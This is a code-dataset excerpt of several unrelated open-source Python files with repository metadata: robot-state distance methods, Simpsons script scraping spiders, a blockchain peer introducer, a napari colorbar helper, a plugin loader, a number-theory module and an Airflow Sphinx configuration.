        # components (mixes units -- see pos_distance/orn_distance for the
        # separated variants).
        super().distance(other)
        return (
            ((self._x - other._x) ** 2)
            + ((self._y - other._y) ** 2)
            + ((self._z - other._z) ** 2)
            + ((self._roll - other._roll) ** 2)
            + ((self._pitch - other._pitch) ** 2)
            + ((self._yaw - other._yaw) ** 2)
        ) ** 0.5
    def pos_distance(self, other: "RobotState") -> float:
        """The distance between the positions of two states."""
        super().distance(other)
        return (
            ((self._x - other._x) ** 2)
            + ((self._y - other._y) ** 2)
            + ((self._z - other._z) ** 2)
        ) ** 0.5
    def orn_distance(self, other: "RobotState") -> float:
        """The distance between the orientations of two states."""
        super().distance(other)
        return (
            ((self._roll - other._roll) ** 2)
            + ((self._pitch - other._pitch) ** 2)
            + ((self._yaw - other._yaw) ** 2)
        ) ** 0.5
| 28.375984 | 78 | 0.543115 |
b13c9cd265d19c188c6a4398a2402e4d49f4d785 | 3,215 | py | Python | crawler/crawler/spiders/scrape.py | VikParuchuri/simpsons-scripts | 4356fb90bedfa3e5fd1ea6c974e5d27842af06e6 | [
"Apache-2.0"
] | 15 | 2015-02-26T16:05:37.000Z | 2021-11-24T14:59:29.000Z | crawler/crawler/spiders/scrape.py | VikParuchuri/simpsons-scripts | 4356fb90bedfa3e5fd1ea6c974e5d27842af06e6 | [
"Apache-2.0"
] | null | null | null | crawler/crawler/spiders/scrape.py | VikParuchuri/simpsons-scripts | 4356fb90bedfa3e5fd1ea6c974e5d27842af06e6 | [
"Apache-2.0"
] | 4 | 2016-11-17T00:47:11.000Z | 2018-12-18T03:55:46.000Z | from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.selector import HtmlXPathSelector
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from scrapy.item import Item, Field
import re
snpp_base_url = "http://www.snpp.com/episodes.html"
ss_base_url = "http://www.springfieldspringfield.co.uk/episode_scripts.php"
sc_base_url = "http://www.simpsoncrazy.com/scripts"
class Script(Item):
    """Scrapy item representing one scraped episode script."""
    url = Field()  # page the script was scraped from
    episode_name = Field()  # episode title text
    script = Field()  # full script / subtitle body
class SimpsonsSpider(CrawlSpider):
    """Crawls snpp.com episode pages and extracts full episode scripts."""
    name = "snpp"
    allowed_domains = ['www.snpp.com', 'snpp.com']
    start_urls = [snpp_base_url]
    # Follow /episodes/<id>.html links and hand each page to parse_script.
    rules = [Rule(SgmlLinkExtractor(allow=['/episodes/\w+.html']), 'parse_script')]
    def fix_field_names(self, field_name):
        """Normalize a field name: spaces -> underscores, drop colons.

        NOTE(review): not referenced anywhere in this spider -- appears to be
        dead code kept for parity with the sibling spiders.
        """
        field_name = re.sub(" ","_", field_name)
        field_name = re.sub(":","", field_name)
        return field_name
    def parse_script(self, response):
        """Build a Script item: title from <h1>, body from all <pre> text."""
        x = HtmlXPathSelector(response)
        script = Script()
        script['url'] = response.url
        script['episode_name'] = "".join(x.select("//h1/text()").extract())
        script['script'] = " ".join(x.select("//pre/text()").extract())
        return script
class SubtitleSpider(CrawlSpider):
    """Crawls springfieldspringfield.co.uk subtitle-style episode scripts."""
    name = "ss"
    allowed_domains = ['www.springfieldspringfield.co.uk', 'springfieldspringfield.co.uk']
    start_urls = [ss_base_url]
    # Follow the per-episode view pages and hand each to parse_script.
    rules = [Rule(SgmlLinkExtractor(allow=['/view_episode_scripts.php\?tv-show=the-simpsons&episode=\w+']), 'parse_script')]
    def fix_field_names(self, field_name):
        """Normalize a field name: spaces -> underscores, drop colons.

        NOTE(review): not referenced anywhere in this spider -- appears to be
        dead code kept for parity with the sibling spiders.
        """
        field_name = re.sub(" ","_", field_name)
        field_name = re.sub(":","", field_name)
        return field_name
    def parse_script(self, response):
        """Build a Script item: title from <h3>, body from the episode_script div."""
        x = HtmlXPathSelector(response)
        script = Script()
        script['url'] = response.url
        script['episode_name'] = "".join(x.select("//h3/text()").extract())
        script['script'] = "\n".join(x.select("//div[@class='episode_script']/text()").extract())
        return script
class SimpsonsSpider2(CrawlSpider):
    """Crawls simpsoncrazy.com scripts, pairing ALL-CAPS speaker paragraphs
    with the dialogue paragraph that follows them."""
    name = "sc"
    allowed_domains = ['www.simpsoncrazy.com', 'simpsoncrazy.com']
    start_urls = [sc_base_url]
    rules = [Rule(SgmlLinkExtractor(allow=['/scripts/\w+']), 'parse_script')]
    def fix_field_names(self, field_name):
        """Normalize a field name: spaces -> underscores, drop colons.

        NOTE(review): unused here; kept for parity with the sibling spiders.
        """
        field_name = re.sub(" ","_", field_name)
        field_name = re.sub(":","", field_name)
        return field_name
    def parse_script(self, response):
        """Build a Script item whose body is "Speaker: dialogue" lines.

        A paragraph that is entirely upper-case is treated as a speaker name
        and joined with the following paragraph as that speaker's line.
        """
        x = HtmlXPathSelector(response)
        script = Script()
        script['url'] = response.url
        script['episode_name'] = "".join(x.select("//h1/text()").extract())
        # Strip control whitespace from every paragraph (replaces the old
        # Python-2 xrange index loop).
        all_text = [
            re.sub("[\r\t\n]", "", t).strip()
            for t in x.select("//p/text()").extract()
        ]
        counter = 0
        new_text = []
        # BUGFIX: guard counter + 1 so a trailing ALL-CAPS paragraph no longer
        # raises IndexError (the old loop read all_text[counter + 1] unchecked).
        while counter < len(all_text):
            line = all_text[counter]
            if line.upper() == line and counter + 1 < len(all_text):
                new_text.append(line.title() + ": " + all_text[counter + 1])
                counter += 2
            else:
                counter += 1
        script['script'] = "\n".join(new_text)
        return script
e7602e4c24e3b25cf051c7a4c467a82bd8832171 | 1,909 | py | Python | tad/introducer/introducer_api.py | randywessels/tad-blockchain | 08a5f9565aa27f211350717d5e8cda14b46359e4 | [
"Apache-2.0"
] | 13 | 2021-07-20T15:21:54.000Z | 2022-02-09T04:32:56.000Z | tad/introducer/introducer_api.py | randywessels/tad-blockchain | 08a5f9565aa27f211350717d5e8cda14b46359e4 | [
"Apache-2.0"
] | 8 | 2021-07-21T17:22:59.000Z | 2021-09-18T23:01:59.000Z | tad/introducer/introducer_api.py | randywessels/tad-blockchain | 08a5f9565aa27f211350717d5e8cda14b46359e4 | [
"Apache-2.0"
] | 1 | 2021-07-20T18:14:02.000Z | 2021-07-20T18:14:02.000Z | from typing import Callable, Optional
from tad.introducer.introducer import Introducer
from tad.protocols.introducer_protocol import RequestPeersIntroducer, RespondPeersIntroducer
from tad.protocols.protocol_message_types import ProtocolMessageTypes
from tad.server.outbound_message import Message, make_msg
from tad.server.ws_connection import WSTadConnection
from tad.types.peer_info import TimestampedPeerInfo
from tad.util.api_decorators import api_request, peer_required
from tad.util.ints import uint64
class IntroducerAPI:
    """RPC API surface for the introducer node, serving peer lists."""
    # Handle to the underlying introducer service instance.
    introducer: Introducer
    def __init__(self, introducer: Introducer) -> None:
        self.introducer = introducer
    def _set_state_changed_callback(self, callback: Callable):
        # Intentionally a no-op: the introducer reports no state changes.
        pass
    @peer_required
    @api_request
    async def request_peers_introducer(
        self,
        request: RequestPeersIntroducer,
        peer: WSTadConnection,
    ) -> Optional[Message]:
        """Reply to a peer-list request with up to max_peers vetted peers.

        ``request`` carries no payload used here; ``peer`` is the requesting
        connection (injected by @peer_required). Returns None when the server
        or its peer store is unavailable.
        """
        max_peers = self.introducer.max_peers_to_send
        if self.introducer.server is None or self.introducer.server.introducer_peers is None:
            return None
        # Over-sample (5x the target count) so enough candidates remain after
        # the vetting/self-address filters below.
        rawpeers = self.introducer.server.introducer_peers.get_peers(
            max_peers * 5, True, self.introducer.recent_peer_threshold
        )
        peers = []
        for r_peer in rawpeers:
            # Skip peers that have not passed vetting.
            if r_peer.vetted <= 0:
                continue
            # Don't echo the requester's own address back to it.
            if r_peer.host == peer.peer_host and r_peer.port == peer.peer_server_port:
                continue
            # Timestamp is deliberately zeroed before sharing.
            peer_without_timestamp = TimestampedPeerInfo(
                r_peer.host,
                r_peer.port,
                uint64(0),
            )
            peers.append(peer_without_timestamp)
            if len(peers) >= max_peers:
                break
        self.introducer.log.info(f"Sending vetted {peers}")
        msg = make_msg(ProtocolMessageTypes.respond_peers_introducer, RespondPeersIntroducer(peers))
        return msg
| 33.491228 | 100 | 0.686223 |
674f791daecb50c0cbca8ae6a781e3ecfd36b7fa | 940 | py | Python | napari/utils/colormaps/colorbars.py | OKaluza/napari | 95a6afbbdb54a530b1eaca23037b8f98c7c8b064 | [
"BSD-3-Clause"
] | null | null | null | napari/utils/colormaps/colorbars.py | OKaluza/napari | 95a6afbbdb54a530b1eaca23037b8f98c7c8b064 | [
"BSD-3-Clause"
] | 4 | 2019-12-08T20:20:44.000Z | 2020-01-16T21:57:33.000Z | napari/utils/colormaps/colorbars.py | OKaluza/napari | 95a6afbbdb54a530b1eaca23037b8f98c7c8b064 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
def make_colorbar(cmap, size=(12, 28), horizontal=True):
"""Make a colorbar from a colormap.
Parameters
----------
cmap : vispy.color.Colormap
Colormap to create colorbar with.
size : 2-tuple
Shape of colorbar.
horizontal : bool
If True colobar is oriented horizontal, otherwise it is oriented
vertical.
Returns
----------
cbar : array
Array of colorbar.
"""
if horizontal:
input = np.linspace(0, 1, size[1])
bar = np.tile(np.expand_dims(input, 1), size[0]).transpose((1, 0))
else:
input = np.linspace(0, 1, size[0])
bar = np.tile(np.expand_dims(input, 1), size[1])
# cmap.__getitem__ returns a vispy.color.ColorArray
color_array = cmap[bar.ravel()]
# the ColorArray.RGBA method returns a normalized uint8 array
cbar = color_array.RGBA.reshape(bar.shape + (4,))
return cbar
| 26.111111 | 74 | 0.610638 |
0958928bcf350c427c35a34b86a28f5ff950beb3 | 3,009 | py | Python | pidtree_bcc/plugins/__init__.py | Yelp/pidtree-bcc | ea54752b873687a159091d509df3a4f9dcc4a994 | [
"BSD-3-Clause"
] | 20 | 2019-11-11T20:03:31.000Z | 2022-01-26T05:53:34.000Z | pidtree_bcc/plugins/__init__.py | Yelp/pidtree-bcc | ea54752b873687a159091d509df3a4f9dcc4a994 | [
"BSD-3-Clause"
] | 29 | 2019-10-21T21:38:33.000Z | 2022-03-09T14:44:41.000Z | pidtree_bcc/plugins/__init__.py | Yelp/pidtree-bcc | ea54752b873687a159091d509df3a4f9dcc4a994 | [
"BSD-3-Clause"
] | 4 | 2019-10-18T22:30:28.000Z | 2021-09-10T02:36:04.000Z | import logging
from typing import List
from pidtree_bcc.utils import find_subclass
class BasePlugin:
    """Base class for output-processing plugins.

    Subclasses override :meth:`process` (required) and
    :meth:`validate_args` (optional).
    """

    # Specifies which probes are compatible with the plugin
    # Set to "*" to allow all probes
    PROBE_SUPPORT = tuple()

    def __init__(self, args: dict):
        """ Constructor

        :param dict args: plugin parameters
        """
        self.validate_args(args)

    def process(self, event: dict) -> dict:
        """ Process the `event` dict, add in additional metadata and return a dict

        :param dict event: event dictionary
        :return: processed event dictionary
        """
        # BUGFIX: instances have no ``__name__`` attribute, so the old
        # ``self.__name__`` raised AttributeError instead of the intended
        # NotImplementedError; use the class name instead.
        raise NotImplementedError(
            'Required method `process` has not been implemented by {}'.format(
                type(self).__name__,
            ),
        )

    def validate_args(self, args: dict):
        """ Not required, override in inheriting class if you want to use this

        :param dict args: plugin parameters
        """
        pass
def load_plugins(plugin_dict: dict, calling_probe: str, extra_plugin_path: str = None) -> List[BasePlugin]:
    """ Load and configure plugins

    :param dict plugin_dict: where the keys are plugin names and the value
                             for each key is another dict of kwargs. Each key
                             must match a `.py` file in the plugin directory
    :param str calling_probe: name of the calling probe for support validation
    :param str extra_plugin_path: (optional) extra package path where to look for plugins
    :return: list of loaded plugins
    :raises RuntimeError: when a plugin cannot be imported/found or does not
                          support the calling probe (unless the plugin sets
                          ``unload_on_init_exception``, in which case the
                          error is only logged and the plugin is skipped)
    """
    plugins = []
    for plugin_name, plugin_args in plugin_dict.items():
        error = None
        # Per-plugin flag: log-and-skip instead of raising on load failure.
        unload_on_init_exception = plugin_args.get(
            'unload_on_init_exception', False,
        )
        if not plugin_args.get('enabled', True):
            continue
        # Candidate module paths: the built-in plugin package first, then the
        # extra path (each only if non-empty).
        plugin_packages = [
            '{}.{}'.format(p, plugin_name)
            for p in (__package__, extra_plugin_path) if p
        ]
        try:
            plugin_class = find_subclass(plugin_packages, BasePlugin)
            if plugin_class.PROBE_SUPPORT != '*' and calling_probe not in plugin_class.PROBE_SUPPORT:
                raise RuntimeError(
                    '{} is not among supported probes for plugin {}: {}'
                    .format(calling_probe, plugin_name, plugin_class.PROBE_SUPPORT),
                )
            plugins.append(plugin_class(plugin_args))
        except ImportError as e:
            # Wrap import failures with the searched package list for context.
            error = RuntimeError(
                'Could not import {}: {}'
                .format(plugin_packages, e),
            )
        except StopIteration as e:
            # find_subclass exhausted candidates without a BasePlugin subclass.
            error = RuntimeError(
                'Could not find plugin class in module {}: {}'
                .format(plugin_packages, e),
            )
        except Exception as e:
            error = e
        finally:
            # All failure paths converge here: either log and continue with
            # the next plugin, or re-raise for the caller to handle.
            if error:
                if unload_on_init_exception:
                    logging.error(str(error))
                else:
                    raise error
    return plugins
| 34.586207 | 107 | 0.5889 |
120d14805c68a62a05c0a3b41f12afb888f8640d | 7,048 | py | Python | project/number.py | rainbowhuanguw/electionguard-SDK | 789def57a8aa6a43fa59af4e9e8bfb37ea6ebe1c | [
"MIT"
] | null | null | null | project/number.py | rainbowhuanguw/electionguard-SDK | 789def57a8aa6a43fa59af4e9e8bfb37ea6ebe1c | [
"MIT"
] | null | null | null | project/number.py | rainbowhuanguw/electionguard-SDK | 789def57a8aa6a43fa59af4e9e8bfb37ea6ebe1c | [
"MIT"
] | null | null | null | import random
import hashlib
from typing import (
Sequence
)
LARGE_PRIME = (int(('''104438888141315250669175271071662438257996424904738378038423348328
3953907971553643537729993126875883902173634017777416360502926082946377942955704498
5420976148418252467735806893983863204397479111608977315510749039672438834271329188
1374801626975452234350528589881677721176191239277291448552115552164104927344620757
8961939840619466145806859275053476560973295158703823395710210329314709715239251736
5523840808458360487786673189314183384224438910259118847234330847012077719019445932
8662497991739135056466263272370300796422984915475619689061525228653308964318490270
6926081744149289517418249153634178342075381874131646013444796894582106870531535803
6662545796026324531037414525697939055519015418561732513850474148403927535855819099
5015804625681054267836812127850996052095762473794291460031064660979266501285839738
1435755902851312071248102599442308951327039250818892493767423329663783709190716162
0235296692173009397831714158082331468230007669177892861540060422814237337064629052
4377485454312723950024587358201266366643058386277816736954760301634424272959224454
4608279405999759391099775667746401633668308698186721172238255007962658564443858927
6348504157753488390520266757856948263869301753031434500465754608438799417919463132
99322976993405829119''').replace('\n', '')))
SMALL_PRIME = pow(2, 256) - 189
def is_prime(num: int, k=5) -> bool:
    """
    Probabilistic primality check using the Miller-Rabin algorithm.

    :param num: a positive integer to test
    :param k: number of independent witness rounds; more rounds give
              higher accuracy (default 5)
    :return: True if ``num`` is (probably) prime, False if composite
    """
    # Small-number special cases.
    if num in (2, 3):
        return True
    if num <= 1 or num == 4:
        return False
    # Express num - 1 as d * 2^r with d odd.
    d = num - 1
    while d % 2 == 0:
        d //= 2
    # The candidate is declared prime only if every round passes.
    return all(__miller_test(d, num) for _ in range(k))


def __miller_test(d: int, num: int) -> bool:
    """
    Run one Miller-Rabin round against a random witness.

    :param d: odd factor satisfying num - 1 == d * 2^r for some r >= 1
    :param num: the candidate being tested (must be > 4)
    :return: True if num passes this round, False if proven composite
    """
    # Pick a random witness in [3, num - 2].
    witness = 2 + random.randint(1, num - 4)
    x = pow(witness, d, num)
    if x in (1, num - 1):
        return True
    # Square repeatedly: reaching num - 1 means the round passes; reaching 1
    # first proves num composite.
    while d != num - 1:
        x = (x * x) % num
        d *= 2
        if x == 1:
            return False
        if x == num - 1:
            return True
    return False
def equals(a, b) -> bool:
    """
    Check whether two values are numerically equal after int coercion.

    :param a: first value (anything accepted by int())
    :param b: second value (anything accepted by int())
    :return: True when int(a) == int(b), False otherwise
    """
    return int(a) == int(b)
def is_divisor(a, b) -> bool:
    """
    check if a is a divisor of b
    :param a: a positive integer
    :param b: b positive integer
    :return: True if a is a divisor of b, False otherwise
    """
    # NOTE(review): the implementation evaluates ``a % b == 0``, i.e. whether
    # *b* divides *a* -- the opposite of what the name and docstring say. It
    # also raises ZeroDivisionError when b == 0. Confirm the intended
    # direction with callers before changing either the code or the doc.
    a, b = int(a), int(b)
    return a % b == 0
def is_within_range(num, lower_bound: int, upper_bound: int) -> bool:
    """
    Test whether a number lies strictly between two bounds.

    :param num: value to check (coerced with int())
    :param lower_bound: exclusive lower bound
    :param upper_bound: exclusive upper bound
    :return: True when lower_bound < num < upper_bound
    :raises ValueError: if upper_bound is smaller than lower_bound
    """
    value = int(num)
    if upper_bound < lower_bound:
        raise ValueError("bounds are incorrect")
    return lower_bound < value < upper_bound
def is_within_set_zq(num) -> bool:
    """
    Check membership of the set Z_q = {0, 1, ..., q - 1}.

    :param num: value to test (coerced with int())
    :return: True when 0 <= num < q, False otherwise
    """
    # is_within_range uses exclusive bounds, so the lower bound is widened to
    # -1 to make 0 an accepted value.
    return is_within_range(int(num), -1, SMALL_PRIME)
def is_within_set_zrp(num) -> bool:
    """
    Check membership of Z*_rp: 0 < num < p and num^q mod p == 1.

    :param num: value to test (coerced with int())
    :return: True when both conditions hold, False otherwise
    """
    value = int(num)
    # Bounds check first so the (expensive) modular exponentiation is only
    # performed for in-range values, matching the original short-circuit.
    if not is_within_range(value, 0, LARGE_PRIME):
        return False
    return equals(pow(value, SMALL_PRIME, LARGE_PRIME), 1)
def mod_p(dividend) -> int:
    """
    Reduce a value modulo the large prime p.

    :param dividend: value to reduce (coerced with int())
    :return: dividend mod p
    """
    return int(dividend) % LARGE_PRIME
def mod_q(dividend) -> int:
    """
    Reduce a value modulo the small prime q.

    :param dividend: value to reduce (coerced with int())
    :return: dividend mod q
    """
    return int(dividend) % SMALL_PRIME
def multiply(*args, mod_num=1) -> int:
    """
    Compute the product of all arguments modulo ``mod_num``.

    Each factor is reduced as it is folded in so intermediate values stay
    small; the final result is always in [0, mod_num).

    :param args: integer factors to multiply together
    :param mod_num: the modulus (default 1, which always yields 0)
    :return: (product of args) mod mod_num
    """
    result = 1
    for factor in args:
        result = (result * (factor % mod_num)) % mod_num
    # Final reduction also covers the empty-argument case (result == 1).
    return result % mod_num
def hash_elems(*a):
    """
    main hash function using SHA-256, used in generating data, reference:
    :param a: elements being fed into the hash function
    :return: a hash number of 256 bit
    """
    h = hashlib.sha256()
    # Leading separator byte; every element below is also suffixed with "|".
    h.update("|".encode("utf-8"))
    for x in a:
        if not x:
            # This case captures empty lists and None, nicely guaranteeing that we don't
            # need to do a recursive call if the list is empty. So we need a string to
            # feed in for both of these cases. "None" would be a Python-specific thing,
            # so we'll go with the more JSON-ish "null".
            # NOTE(review): ``not x`` is also True for 0 and 0.0, so a zero
            # value hashes identically to "null" -- confirm this is intended.
            hash_me = "null"
        elif isinstance(x, str):
            # strings are iterable, so it's important to handle them before the following check
            hash_me = x
        elif isinstance(x, Sequence):
            # The simplest way to deal with lists, tuples, and such are to crunch them recursively.
            hash_me = str(hash_elems(*x))
        else:
            hash_me = str(x)
        h.update((hash_me + "|").encode("utf-8"))
    # Note: the returned value will range from [1,Q), because zeros are bad
    # for some of the nonces. (g^0 == 1, which would be an unhelpful thing
    # to multiply something with, if you were trying to encrypt it.)
    # Also, we don't need the checked version of int_to_q, because the
    # modulo operation here guarantees that we're in bounds.
    # return int_to_q_unchecked(
    #     1 + (int.from_bytes(h.digest(), byteorder="big") % Q_MINUS_ONE)
    # )
    # NOTE(review): the active code below reduces mod (SMALL_PRIME - 1) with
    # no "+ 1", so the actual range is [0, Q-1) -- it can return 0, contrary
    # to the [1,Q) claim above and the commented-out variant. Confirm which
    # behavior is intended.
    return int.from_bytes(h.digest(), byteorder="big") % (SMALL_PRIME - 1)
17c6854f0b75f8002ede36a52da21ac22b3f0153 | 175 | py | Python | workbook/myFirstModule.py | hasanzainul10/cv-1 | 102b110170b5951a866ed0fc01284b4cd99bfc8b | [
"MIT"
] | null | null | null | workbook/myFirstModule.py | hasanzainul10/cv-1 | 102b110170b5951a866ed0fc01284b4cd99bfc8b | [
"MIT"
] | null | null | null | workbook/myFirstModule.py | hasanzainul10/cv-1 | 102b110170b5951a866ed0fc01284b4cd99bfc8b | [
"MIT"
] | null | null | null | ##myFirstModule
def greeting(name):
print(f"Hello {name}")
def goodbye(name):
print(f"Goodbye {name}")
person1 = {"age" : 12, "name": "john", "country":"malaysia"} | 17.5 | 60 | 0.622857 |
0c390ca5b391194b5823411a9b5960fbf96f549b | 18,465 | py | Python | docs/conf.py | ywf5566/airflow | e7872dddbf275729b2c42e2a4ff602a6df7d1536 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | docs/conf.py | ywf5566/airflow | e7872dddbf275729b2c42e2a4ff602a6df7d1536 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | docs/conf.py | ywf5566/airflow | e7872dddbf275729b2c42e2a4ff602a6df7d1536 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# flake8: noqa
# Disable Flake8 because of all the sphinx imports
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Airflow documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 9 20:50:01 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
"""Configuration of Airflow Docs"""
import os
import sys
from typing import Dict
import airflow
from airflow.configuration import default_config_yaml
try:
import sphinx_airflow_theme # pylint: disable=unused-import
airflow_theme_is_available = True
except ImportError:
airflow_theme_is_available = False
autodoc_mock_imports = [
'MySQLdb',
'adal',
'analytics',
'azure',
'azure.cosmos',
'azure.datalake',
'azure.mgmt',
'boto3',
'botocore',
'bson',
'cassandra',
'celery',
'cloudant',
'cryptography',
'cx_Oracle',
'datadog',
'distributed',
'docker',
'google',
'google_auth_httplib2',
'googleapiclient',
'grpc',
'hdfs',
'httplib2',
'jaydebeapi',
'jenkins',
'jira',
'kubernetes',
'mesos',
'msrestazure',
'pandas',
'pandas_gbq',
'paramiko',
'pinotdb',
'psycopg2',
'pydruid',
'pyhive',
'pyhive',
'pymongo',
'pymssql',
'pysftp',
'qds_sdk',
'redis',
'simple_salesforce',
'slackclient',
'smbclient',
'snowflake',
'sshtunnel',
'tenacity',
'vertica_python',
'winrm',
'zdesk',
]
# Hack to allow changing for piece of the code to behave differently while
# the docs are being built. The main objective was to alter the
# behavior of the utils.apply_default that was hiding function headers
os.environ['BUILDING_AIRFLOW_DOCS'] = 'TRUE'
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), 'exts'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.graphviz',
'sphinxarg.ext',
'sphinxcontrib.httpdomain',
'sphinxcontrib.jinja',
'sphinx.ext.intersphinx',
'autoapi.extension',
'exampleinclude',
'docroles',
'removemarktransform',
'sphinx_copybutton',
]
autodoc_default_options = {
'show-inheritance': True,
'members': True
}
jinja_contexts = {
'config_ctx': {"configs": default_config_yaml()}
}
viewcode_follow_imported_members = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Airflow'
# copyright = u''
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
version = airflow.__version__
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
release = airflow.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
'_api/airflow/api',
'_api/airflow/bin',
'_api/airflow/config_templates',
'_api/airflow/configuration',
'_api/airflow/contrib/auth',
'_api/airflow/contrib/example_dags',
'_api/airflow/contrib/index.rst',
'_api/airflow/contrib/kubernetes',
'_api/airflow/contrib/task_runner',
'_api/airflow/contrib/utils',
'_api/airflow/dag',
'_api/airflow/default_login',
'_api/airflow/example_dags',
'_api/airflow/index.rst',
'_api/airflow/jobs',
'_api/airflow/kubernetes_deprecated',
'_api/airflow/lineage',
'_api/airflow/logging_config',
'_api/airflow/macros',
'_api/airflow/migrations',
'_api/airflow/plugins_manager',
'_api/airflow/security',
'_api/airflow/serialization',
'_api/airflow/settings',
'_api/airflow/sentry',
'_api/airflow/stats',
'_api/airflow/task',
'_api/airflow/typing_compat',
'_api/airflow/kubernetes',
'_api/airflow/ti_deps',
'_api/airflow/upgrade',
'_api/airflow/utils',
'_api/airflow/version',
'_api/airflow/www',
'_api/airflow/www_rbac',
'_api/kubernetes_executor',
'_api/main',
'_api/mesos_executor',
'autoapi_templates',
'howto/operator/gcp/_partials',
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = True
intersphinx_mapping = {
'boto3': ('https://boto3.amazonaws.com/v1/documentation/api/latest/', None),
'mongodb': ('https://api.mongodb.com/python/current/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'python': ('https://docs.python.org/3/', None),
'requests': ('https://requests.readthedocs.io/en/master/', None),
'sqlalchemy': ('https://docs.sqlalchemy.org/en/latest/', None),
'hdfs': ('https://hdfscli.readthedocs.io/en/latest/', None),
# google-cloud-python
'google-cloud-automl': ('https://googleapis.dev/python/automl/latest', None),
'google-cloud-bigquery': ('https://googleapis.dev/python/bigquery/latest', None),
'google-cloud-bigquery-datatransfer': ('https://googleapis.dev/python/bigquerydatatransfer/latest', None),
'google-cloud-bigquery-storage': ('https://googleapis.dev/python/bigquerystorage/latest', None),
'google-cloud-bigtable': ('https://googleapis.dev/python/bigtable/latest', None),
'google-cloud-container': ('https://googleapis.dev/python/container/latest', None),
'google-cloud-core': ('https://googleapis.dev/python/google-cloud-core/latest', None),
'google-cloud-datastore': ('https://googleapis.dev/python/datastore/latest', None),
'google-cloud-dlp': ('https://googleapis.dev/python/dlp/latest', None),
'google-cloud-kms': ('https://googleapis.dev/python/cloudkms/latest', None),
'google-cloud-language': ('https://googleapis.dev/python/language/latest', None),
'google-cloud-pubsub': ('https://googleapis.dev/python/pubsub/latest', None),
'google-cloud-redis': ('https://googleapis.dev/python/redis/latest', None),
'google-cloud-spanner': ('https://googleapis.dev/python/spanner/latest', None),
'google-cloud-speech': ('https://googleapis.dev/python/speech/latest', None),
'google-cloud-storage': ('https://googleapis.dev/python/storage/latest', None),
'google-cloud-tasks': ('https://googleapis.dev/python/cloudtasks/latest', None),
'google-cloud-texttospeech': ('https://googleapis.dev/python/texttospeech/latest', None),
'google-cloud-translate': ('https://googleapis.dev/python/translation/latest', None),
'google-cloud-videointelligence': ('https://googleapis.dev/python/videointelligence/latest', None),
'google-cloud-vision': ('https://googleapis.dev/python/vision/latest', None),
}
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
if airflow_theme_is_available:
html_theme = 'sphinx_airflow_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
import sphinx_rtd_theme # pylint: disable=wrong-import-position,wrong-import-order
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Airflow Documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = ""
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
html_favicon = "../airflow/www/static/pin_32.png"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# A list of JavaScript filename. The entry must be a filename string or a
